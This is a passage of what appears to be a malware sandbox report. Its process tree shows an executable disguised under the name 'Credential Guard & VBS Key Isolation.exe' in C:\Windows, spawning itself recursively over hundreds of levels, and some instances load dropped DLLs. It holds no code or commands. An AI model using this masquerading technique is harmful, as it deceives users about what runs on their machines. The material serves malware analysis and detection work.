        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        261⤵
        
        PID:5532
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        260⤵
        
        PID:6892
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        259⤵
        
        PID:4444
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        258⤵
        
        PID:2408
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        257⤵
        
        PID:2192
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        256⤵
        
        PID:7248
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        255⤵
        
        PID:5312
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        254⤵
        
        PID:2892
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        253⤵
        
        PID:5248
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        252⤵
        
        PID:5900
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        251⤵
        
        PID:7684
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        250⤵
        
        PID:2204
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        249⤵
        
        PID:6588
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        248⤵
        
        PID:6600
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        247⤵
        
        PID:2344
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        246⤵
        
        PID:4164
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        245⤵
        Loads dropped DLL
        
        PID:7088
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        244⤵
        
        PID:1552
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        243⤵
        
        PID:5184
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        242⤵
        
        PID:6604
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        241⤵
        
        PID:7212
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        240⤵
        
        PID:5852
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        239⤵
        
        PID:6044
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        238⤵
        
        PID:1464
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        237⤵
        
        PID:1628
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        236⤵
        
        PID:7316
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        235⤵
        
        PID:6264
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        234⤵
        
        PID:7684
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        233⤵
        
        PID:5204
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        232⤵
        
        PID:6976
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        231⤵
        
        PID:784
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        230⤵
        
        PID:7120
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        229⤵
        
        PID:5216
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        228⤵
        
        PID:4788
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        227⤵
        
        PID:7040
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        226⤵
        
        PID:4364
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        225⤵
        
        PID:1900
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        224⤵
        
        PID:8024
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        223⤵
        
        PID:760
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        222⤵
        
        PID:8052
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        221⤵
        
        PID:5284
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        220⤵
        
        PID:2324
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        219⤵
        Loads dropped DLL
        
        PID:372
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        218⤵
        
        PID:5704
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        217⤵
        
        PID:8032
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        216⤵
        
        PID:5140
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        215⤵
        
        PID:6080
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        214⤵
        
        PID:2092
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        213⤵
        
        PID:5936
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        212⤵
        
        PID:5296
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        211⤵
        Loads dropped DLL
        
        PID:1616
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        210⤵
        
        PID:5196
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        209⤵
        
        PID:7920
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        208⤵
        
        PID:2348
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        207⤵
        
        PID:7760
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        206⤵
        
        PID:7448
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        205⤵
        
        PID:4748
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        204⤵
        
        PID:6812
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        203⤵
        
        PID:5276
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        202⤵
        
        PID:4004
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        201⤵
        
        PID:7684
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        200⤵
        
        PID:2236
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        199⤵
        
        PID:6652
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        198⤵
        
        PID:7540
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        197⤵
        
        PID:1552
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        196⤵
        
        PID:5864
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        195⤵
        
        PID:5616
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        194⤵
        
        PID:3536
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        193⤵
        
        PID:380
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        192⤵
        
        PID:7408
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        191⤵
        
        PID:6888
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        190⤵
        
        PID:7212
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        189⤵
        
        PID:3088
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        188⤵
        
        PID:6892
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        187⤵
        
        PID:5708
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        186⤵
        
        PID:7996
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        185⤵
        
        PID:1288
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        184⤵
        
        PID:2528
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        183⤵
        
        PID:3396
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        182⤵
        
        PID:5744
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        181⤵
        
        PID:6288
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        180⤵
        
        PID:4460
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        179⤵
        
        PID:5092
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        178⤵
        
        PID:5520
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        177⤵
        
        PID:6488
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        176⤵
        Loads dropped DLL
        
        PID:7284
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        175⤵
        
        PID:7700
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        174⤵
        
        PID:5824
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        173⤵
        
        PID:2628
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        172⤵
        
        PID:7884
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        171⤵
        Loads dropped DLL
        
        PID:1644
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        170⤵
        
        PID:3916
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        169⤵
        Loads dropped DLL
        
        PID:5432
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        168⤵
        
        PID:4384
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        167⤵
        
        PID:6440
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        166⤵
        
        PID:7088
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        165⤵
        
        PID:2932
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        164⤵
        
        PID:7920
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        163⤵
        
        PID:3368
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        162⤵
        
        PID:6452
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        161⤵
        
        PID:1428
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        160⤵
        
        PID:1732
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        159⤵
        
        PID:8184
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        158⤵
        
        PID:7296
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        157⤵
        
        PID:6208
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        156⤵
        
        PID:5880
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        155⤵
        
        PID:6688
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        154⤵
        
        PID:5648
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        153⤵
        
        PID:1468
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        152⤵
        
        PID:7236
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        151⤵
        
        PID:7908
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        150⤵
        
        PID:7768
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        149⤵
        
        PID:5748
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        148⤵
        
        PID:5256
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        147⤵
        
        PID:7904
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        146⤵
        
        PID:1532
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        145⤵
        
        PID:7584
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        144⤵
        
        PID:3384
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        143⤵
        
        PID:3932
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        142⤵
        
        PID:3456
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        141⤵
        
        PID:5748
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        140⤵
        
        PID:7700
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        139⤵
        
        PID:6056
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        138⤵
        
        PID:6084
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        137⤵
        
        PID:1172
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        136⤵
        
        PID:3488
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        135⤵
        
        PID:8188
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        134⤵
        
        PID:2008
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        133⤵
        
        PID:8008
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        132⤵
        
        PID:3160
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        131⤵
        
        PID:7340
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        130⤵
        
        PID:6584
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        129⤵
        
        PID:7668
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        128⤵
        
        PID:4456
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        127⤵
        
        PID:6704
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        126⤵
        Loads dropped DLL
        
        PID:7612
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        125⤵
        
        PID:2320
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        124⤵
        
        PID:2680
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        123⤵
        
        PID:5980
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        122⤵
        
        PID:1552
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        121⤵
        
        PID:4924
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        120⤵
        
        PID:8156
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        119⤵
        
        PID:6012
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        118⤵
        
        PID:7880
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        117⤵
        
        PID:5696
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        116⤵
        
        PID:4804
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        115⤵
        
        PID:6608
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        114⤵
        
        PID:7828
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        113⤵
        
        PID:220
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        112⤵
        
        PID:1560
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        111⤵
        
        PID:7744
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        110⤵
        
        PID:4672
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        109⤵
        
        PID:404
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        108⤵
        
        PID:5592
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        107⤵
        
        PID:6940
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        106⤵
        
        PID:6724
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        105⤵
        
        PID:7440
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        104⤵
        
        PID:644
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        103⤵
        
        PID:7884
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        102⤵
        
        PID:4944
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        101⤵
        
        PID:5844
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        100⤵
        
        PID:8100
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        99⤵
        
        PID:6640
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        98⤵
        
        PID:7864
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        97⤵
        
        PID:5180
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        96⤵
        
        PID:1060
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        95⤵
        
        PID:3340
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        94⤵
        
        PID:3608
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        93⤵
        
        PID:6908
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        92⤵
        
        PID:2284
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        91⤵
        
        PID:6840
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        90⤵
        
        PID:7264
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        89⤵
        
        PID:4228
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        88⤵
        
        PID:6312
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        87⤵
        
        PID:3744
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        86⤵
        
        PID:2744
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        85⤵
        
        PID:5696
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        84⤵
        
        PID:3608
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        83⤵
        
        PID:6052
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        82⤵
        
        PID:8008
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        81⤵
        
        PID:7440
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        80⤵
        
        PID:3932
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        79⤵
        
        PID:7612
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        78⤵
        
        PID:4300
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        77⤵
        
        PID:3492
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        76⤵
        
        PID:5252
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        75⤵
        
        PID:6876
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        74⤵
        
        PID:6068
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        73⤵
        
        PID:6564
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        72⤵
        
        PID:7976
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        71⤵
        
        PID:6480
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        70⤵
        
        PID:7932
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        69⤵
        
        PID:7400
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        68⤵
        
        PID:6860
        
